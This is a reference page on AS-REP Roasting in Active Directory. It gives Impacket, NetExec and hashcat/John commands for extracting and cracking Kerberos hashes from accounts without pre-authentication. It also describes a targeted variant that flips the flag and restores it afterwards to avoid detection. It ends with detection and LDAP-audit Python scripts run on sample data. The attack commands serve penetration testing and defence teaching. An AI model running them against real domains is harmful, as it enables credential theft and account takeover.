AS-REP Roasting

Overview

AS-REP Roasting targets accounts that have Kerberos pre-authentication disabled (the DONT_REQUIRE_PREAUTH flag in userAccountControl). When pre-authentication is disabled, anyone who can reach the KDC can request an AS-REP (Authentication Service Response) for that user without knowing the password. The response contains a portion (the enc-part) encrypted with a key derived from the user's password, so it can be cracked offline. Unlike Kerberoasting, AS-REP Roasting does not require valid domain credentials, only a list of usernames.

ATT&CK Mapping

  • Tactic: TA0006 - Credential Access
  • Technique: T1558.004 - Steal or Forge Kerberos Tickets: AS-REP Roasting

Prerequisites

  • List of domain usernames (or valid domain credentials to enumerate)
  • Network access to a Domain Controller (Kerberos, port 88 TCP/UDP)

Techniques

Without Domain Credentials

If you have a username list but no credentials:

# Impacket
# https://github.com/fortra/impacket
impacket-GetNPUsers '<domain>/' -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep.txt

# With specific format for John
impacket-GetNPUsers '<domain>/' -usersfile users.txt -dc-ip <dc_ip> -format john -outputfile asrep.txt

With Domain Credentials

Enumerate all accounts with pre-auth disabled and extract hashes automatically:

# Impacket — find and roast all vulnerable accounts
# https://github.com/fortra/impacket
impacket-GetNPUsers '<domain>/<user>:<password>' -dc-ip <dc_ip> -request

# Save to file
impacket-GetNPUsers '<domain>/<user>:<password>' -dc-ip <dc_ip> -request -format hashcat -outputfile asrep.txt

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --asreproast asrep.txt

Crack AS-REP Hashes

# Hashcat
# https://github.com/hashcat/hashcat

# AS-REP etype 23 (RC4) — mode 18200
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best66.rule

# John the Ripper
# https://github.com/openwall/john
john asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt

Targeted AS-REP Roasting

If you have GenericAll or GenericWrite on a user object, you can disable pre-authentication on it and then AS-REP roast that account:

# Disable pre-auth on a target account (requires write access to the user object)
Set-ADAccountControl -Identity <target_user> -DoesNotRequirePreAuth $true

# Then roast the account with GetNPUsers as in the sections above

# After cracking, re-enable pre-auth to reduce detection
Set-ADAccountControl -Identity <target_user> -DoesNotRequirePreAuth $false

Detection Methods

Network-Based Detection

  • AS-REQs without pre-authentication data (PA-DATA) for multiple accounts
  • Kerberos traffic from non-domain-joined hosts

Host-Based Detection

  • Windows Security Event ID 4768 (A Kerberos authentication ticket (TGT) was requested) with Pre-Authentication Type 0 (no pre-auth)
  • Changes to userAccountControl attribute enabling DONT_REQUIRE_PREAUTH
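The two host-based indicators above can be checked with a small amount of code. The script below is an added example, not part of the original page or of any tool it mentions: it runs over constructed Event 4768 and Event 4738 records (hand-written here, not real telemetry; field names follow the Windows event XML names TargetUserName, IpAddress, PreAuthType, TicketEncryptionType and UserAccountControl) and flags a source that requested AS-REPs without pre-auth for several accounts, plus any account change that enabled "Don't Require Preauth".

```python
"""Detect AS-REP Roasting indicators in Windows Security events.

Added example, not from the original page. The events below are constructed
sample records; in practice they would be read from the Security log or a SIEM.
"""
from collections import defaultdict

# Constructed sample events: one host requesting AS-REPs for three accounts
# without pre-auth, one normal logon, and one userAccountControl change that
# disabled pre-auth on an account (Event 4738, "A user account was changed").
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "10.0.5.23",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "j.doe", "IpAddress": "10.0.5.23",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "legacy_app", "IpAddress": "10.0.5.23",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "a.smith", "IpAddress": "10.0.7.8",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},   # normal: PA-ENC-TIMESTAMP, AES256
    {"EventID": 4738, "TargetUserName": "svc_backup", "SubjectUserName": "helpdesk1",
     "UserAccountControl": "'Don't Require Preauth' - Enabled"},
]


def asrep_requests(events):
    """4768 events with Pre-Authentication Type 0: TGT issued without pre-auth."""
    return [e for e in events
            if e.get("EventID") == 4768 and e.get("PreAuthType") == "0"]


def roasting_sources(events, threshold=2):
    """Group no-pre-auth requests by client IP and return {ip: [accounts]} for
    every source that requested tickets for at least `threshold` distinct accounts.
    A single service account with pre-auth disabled produces one account per
    source; a roasting sweep produces many from one source."""
    by_ip = defaultdict(set)
    for e in asrep_requests(events):
        by_ip[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: sorted(users) for ip, users in by_ip.items()
            if len(users) >= threshold}


def rc4_asrep_accounts(events):
    """Accounts whose no-pre-auth AS-REP used RC4 (etype 0x17), the encryption
    type that hashcat mode 18200 cracks; these deserve the highest priority."""
    return sorted({e["TargetUserName"] for e in asrep_requests(events)
                   if e.get("TicketEncryptionType", "").lower() == "0x17"})


def preauth_disabled_changes(events):
    """(who, which account) for 4738 events whose userAccountControl change
    enabled 'Don't Require Preauth', i.e. set DONT_REQUIRE_PREAUTH."""
    return [(e["SubjectUserName"], e["TargetUserName"]) for e in events
            if e.get("EventID") == 4738
            and "Don't Require Preauth' - Enabled" in e.get("UserAccountControl", "")]


if __name__ == "__main__":
    for ip, users in roasting_sources(SAMPLE_EVENTS).items():
        print(f"ALERT possible AS-REP roasting from {ip}: {', '.join(users)}")
    print("RC4 AS-REPs without pre-auth:", rc4_asrep_accounts(SAMPLE_EVENTS))
    for who, target in preauth_disabled_changes(SAMPLE_EVENTS):
        print(f"ALERT {who} disabled pre-auth on {target}")
```

The threshold on distinct accounts per source is the part worth tuning: a legacy application account with pre-auth disabled legitimately produces PreAuthType 0 events, but only for itself, whereas a sweep with GetNPUsers over a username list produces them for every roastable account from one address.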

Mitigation Strategies

  • Enable pre-authentication — ensure DONT_REQUIRE_PREAUTH is not set on any accounts
  • Strong passwords — enforce long, complex passwords on any account that must keep pre-auth disabled
  • Monitor attribute changes — alert on modifications to userAccountControl that disable pre-auth
  • Regular auditing — periodically query LDAP for accounts with pre-auth disabled
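The auditing and remediation items above come down to one bit in userAccountControl. The following is an added example (not from the original page or any tool it references) that builds the LDAP filter for the audit, decodes constructed sample userAccountControl values to list roastable accounts, and computes the value to write back to re-enable pre-auth. The sample entries are hand-made; a real audit would feed the filter to an LDAP search against the domain controller.

```python
"""Audit userAccountControl for accounts with Kerberos pre-authentication disabled.

Added example, not part of the original page. SAMPLE_ENTRIES is constructed
data standing in for the results of an LDAP search.
"""

# userAccountControl bits (values from the AD schema)
DONT_REQUIRE_PREAUTH = 0x400000   # 4194304: the flag AS-REP Roasting depends on
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000

# Constructed sample LDAP results: (sAMAccountName, userAccountControl)
SAMPLE_ENTRIES = [
    ("j.doe", NORMAL_ACCOUNT),                                              # 512: pre-auth required
    ("svc_backup", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQUIRE_PREAUTH),
    ("legacy_app", NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH),                 # 4194816
    ("old_contractor", NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQUIRE_PREAUTH),
]


def preauth_disabled_filter():
    """LDAP filter matching user objects with DONT_REQUIRE_PREAUTH set.
    1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND extensible match,
    so the comparison value is the flag's integer value (4194304)."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQUIRE_PREAUTH}))")


def accounts_without_preauth(entries):
    """Return [(name, enabled)] for every entry with the pre-auth bit cleared.
    Disabled accounts are still reported: they are not roastable today but
    become so the moment someone re-enables them."""
    return [(name, not (uac & ACCOUNTDISABLE))
            for name, uac in entries if uac & DONT_REQUIRE_PREAUTH]


def clear_preauth_flag(uac):
    """Remediation: the userAccountControl value that re-enables pre-auth,
    leaving every other bit untouched."""
    return uac & ~DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    print("LDAP filter:", preauth_disabled_filter())
    for name, enabled in accounts_without_preauth(SAMPLE_ENTRIES):
        state = "ENABLED" if enabled else "disabled"
        print(f"{name}: pre-auth not required ({state} account)")
    print("svc_backup fixed UAC value:",
          clear_preauth_flag(NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQUIRE_PREAUTH))
```

The same filter works with any LDAP client; on a domain-joined admin host the equivalent check is Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true', and the remediation is the Set-ADAccountControl -DoesNotRequirePreAuth $false call already shown on this page.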
